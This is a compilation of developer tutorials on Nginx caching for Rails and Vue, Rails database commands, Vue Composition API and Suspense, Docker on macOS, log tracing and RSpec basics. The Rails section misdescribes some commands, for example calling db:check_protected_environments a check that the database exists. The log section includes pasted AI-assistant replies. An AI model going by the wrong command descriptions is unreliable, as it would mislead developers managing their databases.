Part 1: Understanding Request Flow and Caching in a Rails + Vue + Nginx Setup

Introduction

When building modern web applications, performance is a critical factor for user experience and SEO. In setups that combine Rails (for backend logic) with Vue 3 (for the frontend), and Nginx + Passenger as the web server layer, developers must understand how requests flow through the system and how caching strategies can maximize efficiency. Without a clear understanding, issues such as stale content, redundant downloads, or poor Google PageSpeed scores can creep in.

In this series, we will break down the architecture into three detailed parts. In this first part, we’ll look at the basic request flow, why caching is needed, and the specific caching strategies applied for different types of assets (HTML, hashed Vue assets, images, fonts, and SEO files).

🔹 1. Basic Request Flow

Let’s first understand how a browser request travels through our stack. In a Rails + Vue + Nginx setup, the flow is layered so that Nginx acts as the gatekeeper, serving static files directly and passing dynamic requests to Rails via Passenger. This ensures maximum efficiency.

Browser Request (user opens https://mydomain.com)
      |
      v
+-------------------------+
|        Nginx            |
| - Serves static files   |
| - Adds cache headers    |
| - Redirects HTTP → HTTPS|
+-------------------------+
      |
      |---> /public/vite/*   (hashed Vue assets: JS, CSS, images)
      |---> /public/assets/* (general static files, fonts, images)
      |---> /public/*.html   (entry files, e.g. vite.html)
      |---> /sitemap.xml, robots.txt
      |
      v
+-------------------------+
| Passenger + Rails       |
| - Handles API requests  |
| - Renders dynamic views |
| - Business logic        |
+-------------------------+
      |
      v
Browser receives response

Key takeaways:

  • Nginx is optimized for serving static files and does this without invoking Rails.
  • Hashed Vue assets live in /public/vite/ and are safe for long-term caching.
  • HTML entry files like vite.html should never be cached aggressively, as they bootstrap the application.
  • Rails only handles requests that cannot be resolved by static files (APIs, dynamic content, authentication, etc.).

🔹 2. Why Caching Matters

Every time a user visits your site, the browser requests resources such as JavaScript, CSS, images, and fonts. Without caching, the browser re-downloads these assets on every visit, leading to:

  • Slower page load times
  • Higher bandwidth usage
  • Poorer SEO scores (Google PageSpeed penalizes missing caching headers)
  • Increased server load

Caching helps by instructing browsers to reuse resources when possible. However, caching needs to be carefully tuned:

  • Static, versioned assets (like hashed JS files) should be cached for a long time.
  • Dynamic or frequently changing files (like HTML, sitemap.xml) should bypass cache.
  • Non-hashed assets (like assets/*.png) can be cached for a shorter duration.

🔹 3. Caching Strategy in Detail

1. Hashed Vue Assets (/vite/ folder)

Files built by Vite include a content hash in their filenames (e.g., index-B34XebCm.js). This ensures that when the file content changes, the filename changes as well. Browsers see this as a new resource and download it fresh. This makes it safe to cache these files aggressively:

location /vite/ {
    expires 1y;
    add_header Cache-Control "public, immutable";
}

This tells browsers to cache these files for a year, and the immutable directive prevents unnecessary revalidation.

2. HTML Files (vite.html and others)

HTML files should always be fresh because they reference the latest asset filenames. If an old HTML file is cached, it might point to outdated JS or CSS, breaking the app. Therefore, HTML must always be served with no-cache:

location ~* \.html$ {
    add_header Cache-Control "no-cache";
}

This forces browsers to check the server every time before using the file.

3. Other Static Assets (images, fonts, non-hashed JS/CSS)

Some assets in /public/assets/ do not have hashed filenames (e.g., logo.png). Caching these too aggressively could cause stale content issues. A shorter cache period (like 1 hour) is a safe balance:

location ~* \.(?:js|css|woff2?|ttf|otf|eot|jpg|jpeg|png|gif|svg|ico)$ {
    expires 1h;
    add_header Cache-Control "public";
}

4. SEO Files (sitemap.xml, robots.txt)

Search engines like Google frequently re-fetch sitemap.xml and robots.txt to keep their index up-to-date. If these files are cached, crawlers may miss recent updates. To avoid this, they should always bypass cache:

location = /sitemap.xml {
    add_header Cache-Control "no-cache";
}
location = /robots.txt {
    add_header Cache-Control "no-cache";
}

🔹 4. Summary Diagram

The diagram below illustrates the request flow and caching rules:

Browser Request
      |
      v
+------------------+          +-------------------+
|      Nginx       |          | Passenger + Rails |
|------------------|          |-------------------|
| - Serves /vite/* |          | - Dynamic APIs    |
|   (1y immutable) |          | - Auth flows      |
| - Serves .html   |          | - Business logic  |
|   (no-cache)     |          +-------------------+
| - Serves assets/*|
|   (1h cache)     |
| - Serves SEO     |
|   (no-cache)     |
+------------------+
      |
      v
Response to Browser

Let’s bring in some real-world examples from well-known Rails projects so you can see how this fits into practice:

🔹 Example 1: Discourse (Rails + Ember frontend, served via Nginx + Passenger)

  • Request flow:
    • Nginx serves all static JS/CSS files that are fingerprinted (application-9f2c01f2b3f.js).
    • Rails generates these during asset precompilation.
    • Fingerprinting ensures cache-busting (like our vite/index-B34XebCm.js).
  • Caching:
    • In their Nginx config, Discourse sets: location ~ ^/assets/ { expires 1y; add_header Cache-Control "public, immutable"; }
    • All .html responses (Rails views) are marked no-cache.
    • This is exactly the same principle we applied for our /vite/ folder.

🔹 Example 2: GitLab (Rails + Vue frontend, Nginx load balancer)

  • Request flow:
    • GitLab has Vue components bundled by Webpack (similar to Vite in our case).
    • Nginx first checks /public/assets/ for compiled frontend assets.
    • If not found → request is passed to Rails via Passenger.
  • Caching:
    • GitLab sets very aggressive caching for hashed assets, because they change only when a new release is deployed: location ~ ^/assets/.*-[a-f0-9]{32}\.(js|css|png|jpg|svg)$ { expires max; add_header Cache-Control "public, immutable"; }
    • Non-hashed files (like /uploads/ user content) get shorter caching (1 hour or 1 day).
    • HTML pages rendered by Rails = no-cache.

🔹 Example 3: Basecamp (Rails + Hotwire, Nginx + Passenger)

  • Request flow:
    • Their entrypoint is still HTML (application.html.erb) served via Rails.
    • Static assets (CSS/JS/images) precompiled into /public/assets.
    • Nginx serves these directly, without touching Rails.
  • Caching:
    • Rails generates digest-based file names (like style-4f8d9d7.css).
    • Nginx rule: location /assets { expires 1y; add_header Cache-Control "public, immutable"; }
    • Same idea: hashed = long cache, HTML = no cache.

👉 What this shows:

  • All large Rails projects (Discourse, GitLab, Basecamp) follow the same caching pattern we’re doing:
    • HTML → no-cache
    • Hashed assets (fingerprinted by build tool) → 1 year, immutable
    • Non-hashed assets → shorter cache (1h–1d)

So what we’re implementing in our setup is the industry standard. ✅

Conclusion

In this part, we established the foundation for how requests move through Nginx, Vue, and Rails, and why caching plays such an essential role in performance and reliability. The key principles are:

  • Hashed files = cache long term
  • HTML and SEO files = never cache
  • Non-hashed static assets = short cache
  • Rails/Passenger handles only dynamic requests

In Part 2, we’ll dive deeper into writing a complete Nginx configuration for Rails + Vue, covering gzip compression, HTTP/2 optimizations, cache busting, and optional Vue Router history mode support.


The Complete Guide to Rails Database Commands: From Basics to Production

Managing databases in Rails can seem overwhelming with all the available commands. This comprehensive guide will walk you through every essential Rails database command, from basic operations to complex real-world scenarios.

Basic Database Commands

Core Database Operations

# Create the database
rails db:create

# Drop (delete) the database
rails db:drop

# Run pending migrations
rails db:migrate

# Rollback the last migration
rails db:rollback

# Rollback multiple migrations
rails db:rollback STEP=3

Schema Management

# Load current schema into database
rails db:schema:load

# Dump current database structure to schema.rb
rails db:schema:dump

# Load structure from structure.sql (for complex databases)
rails db:structure:load

# Dump database structure to structure.sql
rails db:structure:dump

Seed Data

# Run the seed file (db/seeds.rb)
rails db:seed

Combined Commands: The Powerhouses

rails db:setup

What it does: Sets up database from scratch

rails db:setup

Equivalent to:

rails db:create
rails db:schema:load  # Loads from schema.rb
rails db:seed

When to use:

  • First time setting up project on new machine
  • Fresh development environment
  • CI/CD pipeline setup

rails db:reset

What it does: Nuclear option – completely rebuilds database

rails db:reset

Equivalent to:

rails db:drop
rails db:create
rails db:schema:load
rails db:seed

When to use:

  • Development when you want clean slate
  • After major schema changes
  • When your database is corrupted

⚠️ Warning: Destroys all data!

rails db:migrate:reset

What it does: Rebuilds database using migrations

rails db:migrate:reset

Equivalent to:

rails db:drop
rails db:create
rails db:migrate  # Runs all migrations from scratch

When to use:

  • Testing that migrations run cleanly
  • Debugging migration issues
  • Ensuring migration sequence works

Advanced Database Commands

Migration Management

# Rollback to specific migration
rails db:migrate:down VERSION=20240115123456

# Re-run specific migration
rails db:migrate:up VERSION=20240115123456

# Get current migration version
rails db:version

# Check migration status
rails db:migrate:status

Database Information

# Show database configuration
rails db:environment

# Validate database and pending migrations
rails db:abort_if_pending_migrations

# Check if database exists
rails db:check_protected_environments

Environment-Specific Commands

# Run commands on specific environment
rails db:create RAILS_ENV=production
rails db:migrate RAILS_ENV=staging
rails db:seed RAILS_ENV=test

Real-World Usage Scenarios

Scenario 1: New Developer Onboarding

# New developer joins the team
git clone project-repo
cd project
bundle install

# Set up database
rails db:setup

# Or if you prefer running migrations
rails db:create
rails db:migrate
rails db:seed

Scenario 2: Production Deployment

# Safe production deployment
rails db:migrate RAILS_ENV=production

# Never run these in production:
# rails db:reset        ❌ Will destroy data!
# rails db:schema:load  ❌ Will overwrite everything!

Scenario 3: Development Workflow

# Daily development cycle
git pull origin main
rails db:migrate          # Run any new migrations

# If you have conflicts or issues
rails db:rollback         # Undo last migration
# Fix migration file
rails db:migrate          # Re-run

# Major cleanup during development
rails db:reset           # Nuclear option

Scenario 4: Testing Environment

# Fast test database setup
rails db:schema:load RAILS_ENV=test

# Or use the test-specific command
rails db:test:prepare

Environment-Specific Best Practices

Development Environment

# Liberal use of reset commands
rails db:reset              # ✅ Safe to use
rails db:migrate:reset      # ✅ Safe to use
rails db:setup              # ✅ Safe for fresh start

Staging Environment

# Mirror production behavior
rails db:migrate RAILS_ENV=staging  # ✅ Recommended
rails db:seed RAILS_ENV=staging     # ✅ If needed

# Avoid
rails db:reset RAILS_ENV=staging    # ⚠️ Use with caution

Production Environment

# Only safe commands
rails db:migrate RAILS_ENV=production     # ✅ Safe
rails db:rollback RAILS_ENV=production    # ⚠️ With backup

# Never use in production
rails db:reset RAILS_ENV=production       # ❌ NEVER!
rails db:drop RAILS_ENV=production        # ❌ NEVER!
rails db:schema:load RAILS_ENV=production # ❌ NEVER!

Pro Tips and Gotchas

Migration vs Schema Loading

# For existing databases with data
rails db:migrate          # ✅ Incremental, safe

# For fresh databases
rails db:schema:load      # ✅ Faster, clean slate

Data vs Schema

Remember that some operations preserve data differently:

  • db:migrate: Preserves existing data, applies incremental changes
  • db:schema:load: Loads clean schema, no existing data
  • db:reset: Destroys everything, starts fresh

Common Workflow Commands

# The "fix everything" development combo
rails db:reset && rails db:migrate

# The "fresh start" combo  
rails db:drop db:create db:migrate db:seed

# The "production-safe" combo
rails db:migrate db:seed

Quick Reference Cheat Sheet

CommandUse CaseData SafetySpeed
db:migrateIncremental updates✅ SafeMedium
db:setupInitial setup✅ Safe (new DB)Fast
db:resetClean slate❌ Destroys allFast
db:migrate:resetTest migrations❌ Destroys allSlow
db:schema:loadFresh schema❌ No data migrationFast
db:seedAdd sample data✅ AdditiveFast

Conclusion

Understanding Rails database commands is crucial for efficient development and safe production deployments. Start with the basics (db:create, db:migrate, db:seed), get comfortable with the combined commands (db:setup, db:reset), and always remember the golden rule: be very careful with production databases!

The key is knowing when to use each command:

  • Development: Feel free to experiment with db:reset and friends
  • Production: Stick to db:migrate and always have backups
  • Team collaboration: Use migrations to keep everyone in sync

Remember: migrations tell the story of how your database evolved, while schema files show where you ended up. Both are important, and now you know how to use all the tools Rails gives you to manage them effectively.


⚡ Understanding Vue.js Composition API

Vue 3 introduced the Composition API — a modern, function-based approach to building components. If you’ve been using the Options API (data, methods, computed, etc.), this might feel like a big shift. But the Composition API gives you more flexibility, reusability, and scalability.

In this post, we’ll explore what it is, how it works, why it matters, and we’ll finish with a real-world API fetching example.

🧩 What is the Composition API?

The Composition API is a collection of functions (like ref, reactive, watch, computed) that you use inside a setup() function (or <script setup>). Instead of organizing code into option blocks, you compose logic directly.

👉 In short:
It lets you group related logic together in one place, making your components more readable and reusable.


🔑 Core Features

Here are the most important building blocks:

  • ref() → create reactive primitive values (like numbers, strings, booleans).
  • reactive() → create reactive objects or arrays.
  • computed() → define derived values based on reactive state.
  • watch() → run side effects when values change.
  • Lifecycle hooks (onMounted, onUnmounted, etc.) → usable inside setup().
  • Composables → reusable functions built with Composition API logic.

⚖️ Options API vs Composition API

Options API (Vue 2 style)

<script>
export default {
  data() {
    return {
      count: 0
    }
  },
  methods: {
    increment() {
      this.count++
    }
  }
}
</script>


Composition API (Vue 3 style)

<script setup>
import { ref } from 'vue'

const count = ref(0)
const increment = () => count.value++
</script>

<template>
  <p>{{ count }}</p>
  <button @click="increment">+</button>
</template>

✨ Notice the difference:

  • With Options API, logic is split across data and methods.
  • With Composition API, everything (state + methods) is grouped together.

🚀 Why Use Composition API?

  1. Better logic organization → Group related logic in one place.
  2. Reusability → Extract shared code into composables (useAuth, useFetch, etc.).
  3. TypeScript-friendly → Works smoothly with static typing.
  4. Scalable → Easier to manage large and complex components.

🌍 Real-World Example: Fetching API Data

Let’s say we want to fetch user data from an API.

Step 1: Create a composable useFetch.js

// composables/useFetch.js
import { ref, onMounted } from 'vue'

export function useFetch(url) {
  const data = ref(null)
  const error = ref(null)
  const loading = ref(true)

  onMounted(async () => {
    try {
      const res = await fetch(url)
      data.value = await res.json()
    } catch (err) {
      error.value = err
    } finally {
      loading.value = false
    }
  })

  return { data, error, loading }
}


Step 2: Use it inside a component

<script setup>
import { useFetch } from '@/composables/useFetch'

const { data, error, loading } = useFetch('https://jsonplaceholder.typicode.com/users')
</script>

<template>
  <div>
    <p v-if="loading">Loading...</p>
    <p v-if="error">Error: {{ error.message }}</p>
    <ul v-if="data">
      <li v-for="user in data" :key="user.id">{{ user.name }}</li>
    </ul>
  </div>
</template>

✨ What happened?

  • The composable useFetch handles logic for fetching.
  • The component only takes care of rendering.
  • Now, you can reuse useFetch anywhere in your app.

🎯 Final Thoughts

The Composition API makes Vue components cleaner, reusable, and scalable. It might look different at first, but once you start grouping related logic together, you’ll see how powerful it is compared to the Options API.

If you’re building modern Vue 3 apps, learning the Composition API is a must.


🔄 Vue.js: Composition API vs Mixins vs Composables

When working with Vue, developers often ask:

  • What’s the difference between the Composition API and Composables?
  • Do Mixins still matter in Vue 3?
  • When should I use one over the other?

Let’s break it down with clear explanations and examples.

🧩 Mixins (Vue 2 era)

🔑 What are Mixins?

Mixins are objects that contain reusable logic (data, methods, lifecycle hooks) which can be merged into components.

⚡ Example: Counter with a mixin

// mixins/counterMixin.js
export const counterMixin = {
  data() {
    return {
      count: 0
    }
  },
  methods: {
    increment() {
      this.count++
    }
  }
}

<script>
import { counterMixin } from '@/mixins/counterMixin'

export default {
  mixins: [counterMixin]
}
</script>

<template>
  <p>{{ count }}</p>
  <button @click="increment">+</button>
</template>

✅ Pros

  • Easy to reuse logic.
  • Simple syntax.

❌ Cons

  • Name conflicts → two mixins or component methods can override each other.
  • Hard to track where logic comes from in large apps.
  • Doesn’t scale well.

👉 That’s why Vue 3 encourages Composition API + Composables instead.


⚙️ Composition API

🔑 What is it?

The Composition API is a set of functions (ref, reactive, watch, computed, lifecycle hooks) that let you write components in a function-based style.

⚡ Example: Counter with Composition API

<script setup>
import { ref } from 'vue'

const count = ref(0)
const increment = () => count.value++
</script>

<template>
  <p>{{ count }}</p>
  <button @click="increment">+</button>
</template>

👉 Unlike Mixins, all logic lives inside the component — no magic merging.

✅ Pros

  • Explicit and predictable.
  • Works great with TypeScript.
  • Organizes related logic together instead of scattering across options.

🔄 Composables

🔑 What are Composables?

Composables are just functions that use the Composition API to encapsulate and reuse logic.

They’re often named with a use prefix (useAuth, useCounter, useFetch).

⚡ Example: Reusable counter composable

// composables/useCounter.js
import { ref } from 'vue'

export function useCounter() {
  const count = ref(0)
  const increment = () => count.value++
  return { count, increment }
}

Usage in a component:

<script setup>
import { useCounter } from '@/composables/useCounter'

const { count, increment } = useCounter()
</script>

<template>
  <p>{{ count }}</p>
  <button @click="increment">+</button>
</template>

✅ Pros

  • Clear and explicit (unlike Mixins).
  • Reusable across multiple components.
  • Easy to test (plain functions).
  • Scales beautifully in large apps.

🆚 Side-by-Side Comparison

FeatureMixins 🧩Composition API ⚙️Composables 🔄
Introduced inVue 2Vue 3Vue 3
ReusabilityYes, but limitedMostly inside componentsYes, very flexible
Code OrganizationScattered across mixinsGrouped inside setup()Encapsulated in functions
ConflictsPossible (naming issues)NoneNone
TestabilityHarderGoodExcellent
TypeScript SupportPoorStrongStrong
Recommended in Vue 3?❌ Not preferred✅ Yes✅ Yes

🎯 Final Thoughts

  • Mixins were useful in Vue 2, but they can cause naming conflicts and make code hard to trace.
  • Composition API solves these issues by letting you organize logic in setup() with functions like ref, reactive, watch.
  • Composables build on the Composition API — they’re just functions that encapsulate and reuse logic across components.

👉 In Vue 3, the recommended pattern is:

  • Use Composition API inside components.
  • Extract reusable logic into Composables.
  • Avoid Mixins unless maintaining legacy Vue 2 code.

🚀 Optimizing Vue 3 Page Rendering with for Async Components

When building a homepage in Vue, it’s common to split the UI into multiple components. Some of them are purely presentational, while others fetch data from APIs.

Here’s the problem: if one of those components uses an await during its setup, Vue will wait for it before rendering the parent. That means a single API call can block the entire page from appearing to the user.

That’s not what we want. A modern web app should feel snappy and responsive, even when waiting for data.

Vue 3 gives us the perfect tool for this: <Suspense>.


🏗 The Starting Point

Let’s look at a simplified index.vue homepage:

<template>
  <div>
    <Component1 :perServingPrice="data.perServingPrice" />

    <Component2 :perServingPrice="data.perServingPrice" />
    <Component3 :landingContentKey="landingContentKey" />
    <Component4 :perServingPrice="data.perServingPrice" />
    <Component5 :landingContentKey="landingContentKey" />
    <Component6 :recipes="data.recipes" />
    <Component7 :landingContentKey="landingContentKey" />
    <Component8 :recipes="data.recipes" />
  </div>
</template>

<script setup lang="ts">
import Component1 from '@/components/HomePage/Component1.vue'
import Component2 from '@/components/HomePage/Component2.vue'
import Component3 from '@/components/HomePage/Component3.vue'
import Component4 from '@/components/HomePage/Component4.vue'
import Component5 from '@/components/HomePage/Component5.vue'
import Component6 from '@/components/HomePage/Component6.vue'
import Component7 from '@/components/HomePage/Component7.vue'
import Component8 from '@/components/HomePage/Component8.vue'

const data = {
  perServingPrice: 10,
  recipes: [],
}
const landingContentKey = 'homepage'
</script>

Now imagine:

  • Component2 fetches special offers.
  • Component6 fetches recipe data.
  • Component8 fetches trending dishes.

If those API calls are written like this inside a child component:

<script setup lang="ts">
const response = await fetch('/api/recipes')
const recipes = await response.json()
</script>

➡️ Vue will not render the parent index.vue until this await is finished. That means the entire page waits, even though other components (like Component1 and Component3) don’t need that data at all.


⏳ Why Blocking Is a Problem

Let’s simulate the render timeline without <Suspense>:

  • At t=0s: Page requested.
  • At t=0.3s: HTML + JS bundles load.
  • At t=0.4s: Component2 makes an API request.
  • At t=0.8s: Component6 makes an API request.
  • At t=1.2s: Component8 makes an API request.
  • At t=2.0s: All API responses return → finally the page renders.

The user stares at a blank page until everything resolves. 😩


🎯 Enter <Suspense>

The <Suspense> component lets you wrap child components that might suspend (pause) while awaiting data. Instead of blocking the whole page, Vue shows:

  • The rest of the parent page (immediately).
  • A fallback placeholder for the async child until it’s ready.

📝 Example: Wrapping Component6

<Suspense>
  <template #default>
    <Component6 :recipes="data.recipes" />
  </template>
  <template #fallback>
    <div class="skeleton">Loading recipes...</div>
  </template>
</Suspense>

Here’s what happens now:

  • At t=0.4s: The page renders.
  • <Component6> isn’t ready yet, so Vue shows the fallback (Loading recipes...).
  • At t=2.0s: Recipes arrive → Vue automatically replaces the fallback with the actual component.

Result: The page is usable instantly. ✅


🔄 Applying Suspense to Multiple Components

We can selectively wrap only the async components:

<template>
  <div>
    <Component1 :perServingPrice="data.perServingPrice" />

    <Suspense>
      <template #default>
        <Component2 :perServingPrice="data.perServingPrice" />
      </template>
      <template #fallback>
        <div class="skeleton">Loading deals...</div>
      </template>
    </Suspense>

    <Component3 :landingContentKey="landingContentKey" />

    <Suspense>
      <template #default>
        <Component6 :recipes="data.recipes" />
      </template>
      <template #fallback>
        <div class="skeleton">Loading recipes...</div>
      </template>
    </Suspense>

    <Component7 :landingContentKey="landingContentKey" />

    <Suspense>
      <template #default>
        <Component8 :recipes="data.recipes" />
      </template>
      <template #fallback>
        <div class="skeleton">Loading trending dishes...</div>
      </template>
    </Suspense>
  </div>
</template>


📦 Combining with Async Imports

Vue also allows lazy-loading the component itself, not just the data.

<script setup lang="ts">
import { defineAsyncComponent } from 'vue'

const Component6 = defineAsyncComponent(() =>
  import('@/components/HomePage/Component6.vue')
)
</script>

Now:

  • If the component file is heavy, Vue won’t even load it until needed.
  • Suspense covers both the network request and the async component loading.

📊 Before vs After

Without Suspense:

  • Whole page waits until all API calls resolve.
  • User sees blank → page suddenly appears.

With Suspense:

  • Page renders instantly with placeholders.
  • Components hydrate individually as data arrives.
  • User perceives speed even if data is slow.

🏆 Best Practices

  1. Wrap only async components. Don’t spam <Suspense> everywhere.
  2. Always provide a meaningful fallback. Use skeleton loaders, not just “Loading…”.
  3. Lift state when appropriate. If multiple components need the same data, fetch once in the parent and pass it down as props.
  4. Combine Suspense with code-splitting. Async imports keep your initial bundle small.
  5. Group related components. You can wrap multiple components in a single <Suspense> if they depend on the same async source.

✅ Conclusion

With Vue 3 <Suspense>, you can make sure that your homepage never blocks while waiting for data. Each component becomes non-blocking and self-contained, showing a loader until it’s ready.

This is the same direction React and Angular have taken:

  • React → Suspense + Concurrent Rendering.
  • Angular → Route Resolvers + AsyncPipe.
  • Vue → <Suspense> + async setup.

👉 If you want your Vue pages to feel fast and modern, adopt <Suspense> for async components.


Happy Vue Coding!

Working with docker on Mac: Core Docker Concepts | Docker Desktop

Docker is an open‑source platform for packaging applications and their dependencies into lightweight, portable units called containers, enabling consistent behavior across development, testing, and production environments (Docker, Wikipedia). Its core component, the Docker Engine, powers container execution, while Docker Desktop—a user‑friendly application tailored for macOS—bundles the Docker Engine, Docker CLI, Docker Compose, Kubernetes integration, and a visual Dashboard into a seamless package (Docker Documentation).

On macOS, Docker Desktop simplifies container workflows by leveraging native virtualization (HyperKit on Intel Macs, Apple’s Hypervisor.framework on Apple Silicon), eliminating the need for cumbersome VMs like VirtualBox (The Mac Observer, Medium).

Installation is straightforward: simply download the appropriate .dmg installer (Intel or Apple Silicon), drag Docker into the Applications folder, and proceed through setup—granting permissions and accepting licensing as needed (LogicCore Digital Blog). Once up and running, you can verify your setup via commands like:

docker --version
docker run hello-world
docker compose version

These commands confirm successful installation and provide instant access to Docker’s ecosystem on your Mac.


Commands Executed in Local System:

➜ docker --version
zsh: command not found: docker

➜ docker ps
# check the exact container name:
➜ docker ps --format "table {{.Names}}\t{{.Image}}"

# rebuild the containers
➜ docker-compose down
➜ docker-compose up --build

# Error: target webpacker: failed to solve: error getting credentials - err: exec: "docker-credential-desktop": executable file not found in $PATH, out: ``

➜ cat ~/.docker/config.json # remove "credsStore": "desktop"

# Remove all containers and images
➜ docker container prune -f
➜ docker image prune -f
➜ docker ps -a # check containers
➜ docker images # check images
➜ docker-compose up --build -d # build again

# postgres
➜ docker exec -it image-name psql -U username -d database_name

# rails console
➜ docker exec -it image-name rails c

# get into the docker container shell
➜ docker exec -it image-name bash

🐳 1. Difference between docker compose up --build and docker compose up

docker compose up

  • Just starts the containers using the existing images.
  • If the image for a service doesn’t exist locally, Docker will pull it from the registry (e.g., Docker Hub).
  • It will not rebuild your image unless you explicitly tell it to.

docker compose up --build

  • Forces Docker to rebuild the images from the Dockerfile before starting the containers.
  • Useful when you’ve changed:
    • The Dockerfile
    • Files copied into the image
    • Dependencies
  • This ensures your running containers reflect your latest code and build instructions.

📌 Example:

docker compose up         # Use existing images (fast startup)
docker compose up --build # Rebuild images before starting

If you changed your app code and your Docker setup uses bind mounts (volumes), you usually don’t need --build unless the image itself changed.
If you changed the Dockerfile, then you need --build.


🖥 2. Why we use Docker Desktop & can we use Docker without it?

Docker Desktop is basically a GUI + background service that makes Docker easy to run on macOS and Windows.
It includes:

  • Docker Engine (runs containers)
  • Docker CLI
  • Docker Compose
  • Kubernetes (optional)
  • Settings & resource controls (CPU, RAM)
  • Networking setup
  • A UI to view containers, images, logs, etc.

Why needed on macOS & Windows?

  • Docker requires Linux kernel features like cgroups & namespaces.
  • macOS and Windows don’t have these natively, so Docker Desktop runs a lightweight Linux VM behind the scenes (using HyperKit, WSL2, etc.).
  • Without Docker Desktop, you’d need to set up that Linux VM manually, install Docker inside it, and configure networking — which is more complex.

Can you use Docker without Docker Desktop?
Yes, but:

  • On macOS/Windows — you’d have to:
    • Install a Linux VM manually (VirtualBox, VMware, UTM, etc.)
    • SSH into it
    • Install Docker Engine
    • Expose ports and share files manually
  • On Linux — you don’t need Docker Desktop at all, you can install Docker Engine directly via: sudo apt install docker.io
  • For Windows, Microsoft has Docker on WSL2 which can run without the Docker Desktop GUI, but requires WSL2 setup.

💡 In short:

  • Use --build when you change something in the image definition.
  • Docker Desktop = easiest way to run Docker on macOS/Windows.
  • You can skip Docker Desktop, but then you must manually set up a Linux VM with Docker.

🧩 1. Core Docker Concepts

TermWhat it isKey analogy
ImageA read-only blueprint (template) that defines what your app needs to run (OS base, packages, configs, your code). Built from a Dockerfile.Like a recipe for a dish
ContainerA running instance of an image. Containers are isolated processes, not full OSes.Like a meal prepared from the recipe
VolumePersistent storage for containers. Survives container restarts or deletions.Like a pantry/fridge where food stays even after cooking is done
Docker ComposeA YAML-based tool to define & run multi-container apps. Lets you describe services, networks, and volumes in one file and start them all at once.Like a restaurant order sheet for multiple dishes at once
NetworkVirtual network that containers use to talk to each other or the outside world.Like a kitchen intercom system

2. Kubernetes in simple words

Kubernetes (K8s) is a container orchestration system. It’s what you use when you have many containers across many machines and you need to manage them automatically.

What it does:

  • Deploy containers on a cluster of machines
  • Restart them if they crash
  • Scale up/down automatically
  • Load balance traffic between them
  • Handle configuration and secrets
  • Do rolling updates with zero downtime

📌 Analogy
If Docker Compose is like cooking multiple dishes at home, Kubernetes is like running a huge automated kitchen in a restaurant chain — you don’t manually turn on each stove; the system manages resources and staff.


🍏 3. How Docker Works on macOS

Your assumption is right — Docker needs Linux kernel features (cgroups, namespaces, etc.), and macOS doesn’t have them.

So on macOS:

  • Docker Desktop runs a lightweight Linux virtual machine under the hood using Apple’s HyperKit (before) or Apple Virtualization Framework (newer versions).
  • That VM runs the Docker Engine.
  • Your docker CLI in macOS talks to that VM over a socket.
  • All containers run inside that Linux VM, not directly on macOS.

Workflow:

Mac Terminal → Docker CLI → Linux VM in background → Container runs inside VM


4. Hardware Needs for Docker on macOS

Yes, VMs can be heavy, but Docker’s VM for macOS is minimal — not like a full Windows or Ubuntu desktop VM.

Typical Docker Desktop VM:

  • Base OS: Tiny Linux distro (Alpine or LinuxKit)
  • Memory: Usually 2–4 GB (configurable)
  • CPU: 2–4 virtual cores (configurable)
  • Disk: ~1–2 GB base, plus images & volumes you pull

Recommended host machine for smooth Docker use on macOS:

  • RAM: At least 8 GB (16 GB is comfy)
  • CPU: Modern dual-core or quad-core
  • Disk: SSD (fast read/write for images & volumes)

💡 Reason it’s lighter than “normal” VMs:
Docker doesn’t need a full OS with GUI in its VM — just the kernel & minimal services to run containers.


Quick Recap Table:

TermPurposePersistent?
ImageApp blueprintYes (stored on disk)
ContainerRunning app from imageNo (dies when stopped unless data in volume)
VolumeData storage for containersYes
ComposeMulti-container managementYes (config file)
KubernetesCluster-level orchestrationN/A

Quickest way to see per-request Rails logs in Docker

  • Run app logs:
docker compose logs -f --tail=200 main-app
  • Run Sidekiq logs:
docker compose logs -f --tail=200 sidekiq
  • Filter for a single request by its request ID (see below):
docker compose logs -f main-app | rg 'request_id=YOUR_ID'

Ensure logs are emitted to STDOUT (so Docker can collect them)

Your images already set RAILS_LOG_TO_STDOUT=true and the app routes logs to STDOUT:

if ENV["RAILS_LOG_TO_STDOUT"].present?
  logger           = ActiveSupport::Logger.new(STDOUT)
  logger.formatter = config.log_formatter
  config.log_tags  = [:subdomain, :uuid]
  config.logger    = ActiveSupport::TaggedLogging.new(logger)
end

So the docker compose logs commands above are the right way. Tailing log files inside the container usually isn’t needed, but if you want to:

docker compose exec main-app bash -lc 'tail -f log/development.log'

Trace a single request end-to-end

  • Get the request ID from the response (Rails sets X-Request-Id):
REQ=$(curl -s -D - http://localhost:3001/your/path -o /dev/null | awk '/X-Request-Id/ {print $2}' | tr -d '\r')
docker compose logs -f main-app | rg "$REQ"
  • Your app tags logs with a UUID per request; switching to the canonical tag makes grepping easier. Optionally change tags to:
# in `website-v1/config/application.rb`
config.log_tags = [:request_id]

Make logs easier to read (optional, but highly recommended)

  • Add concise, per-request logging (1 line per request) with JSON output for easy grep/parse:
# Gemfile
gem 'lograge'

# config/initializers/lograge.rb
Rails.application.configure do
  config.lograge.enabled = true
  config.lograge.formatter = Lograge::Formatters::Json.new
  config.lograge.custom_options = lambda do |event|
    {
      request_id: event.payload[:request_id],
      params: event.payload[:params].except('controller','action'),
      user_id: event.payload[:user_id],
      time: Time.now.utc
    }
  end
end

Then:

bundle install
docker compose restart main-app
docker compose logs -f main-app

Now you can grep easily:

docker compose logs -f main-app | jq -r 'select(.request_id=="'"$REQ"'")'

Tuning

  • In development, you already have config.log_level = :debug. For production, consider :info instead of :warn to get request lines:
# config/environments/production.rb
config.log_level = :info
  • Sidekiq logs are a separate stream (service sidekiq); use its logs for background job tracing.
  • Noise reduction: you already have config.assets.quiet = true in development.

If you want, I can switch to :request_id tagging and add lograge with JSON in the repo now.

  • Made no code edits; provided commands to stream logs from main-app and sidekiq.
  • Confirmed logs are routed to STDOUT via RAILS_LOG_TO_STDOUT and TaggedLogging in application.rb.
  • Offered optional improvements (switch to :request_id, add lograge JSON) and how to grep a single request by ID.

Complete Guide to RSpec with Rails 7+: From Basics to Advanced Testing

RSpec is the most popular testing framework for Ruby and Rails applications. This comprehensive guide covers everything from basic RSpec syntax to advanced Rails 7+ testing patterns, with real-world examples and scenarios.

Table of Contents

  1. RSpec Basics
  2. Rails 7+ Integration
  3. Core RSpec Methods
  4. Testing Scenarios
  5. Advanced Features
  6. Best Practices

RSpec Basics

Basic Structure

require "rails_helper"

RSpec.describe Session::AppliedDiscount do
  # Test content goes here
end

Key Components:

  • require "rails_helper" – Loads Rails testing environment
  • RSpec.describe – Groups related tests
  • describe can take a class, string, or symbol

